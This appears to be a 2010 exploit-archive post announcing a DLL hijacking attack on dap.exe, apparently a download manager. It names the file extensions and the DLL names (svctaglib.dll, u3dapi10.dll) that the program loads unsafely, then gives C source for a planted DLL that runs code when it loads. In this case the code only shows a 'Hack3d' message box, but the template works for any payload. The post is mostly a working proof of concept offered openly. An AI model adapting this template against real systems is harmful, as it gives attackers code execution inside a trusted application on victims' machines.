######################################################################## # Vendor: http://www.soft32.com/ # Date: 2010-07-27 # Author : indoushka # Thanks to : Dz-Ghost Team # Contact : 00213771818860 # Tested on : windows SP2 Francais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka ------------- wvs.exe ------- exploited dap.exe with exploit.daf using svctaglib.dll exploited dap.exe with exploit.dal using u3dapi10.dll exploited dap.exe with exploit.dal using svctaglib.dll exploited dap.exe with exploit.das using svctaglib.dll exploited dap.exe with exploit.dzs using u3dapi10.dll exploited dap.exe with exploit.dzs using svctaglib.dll exploited dap.exe with exploit.vsl using u3dapi10.dll exploited dap.exe with exploit.vsl using svctaglib.dll ------------- #include "stdafx.h" #include "stdlib.h" void init() { MessageBox(NULL,"indoushka", "Hack3d",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }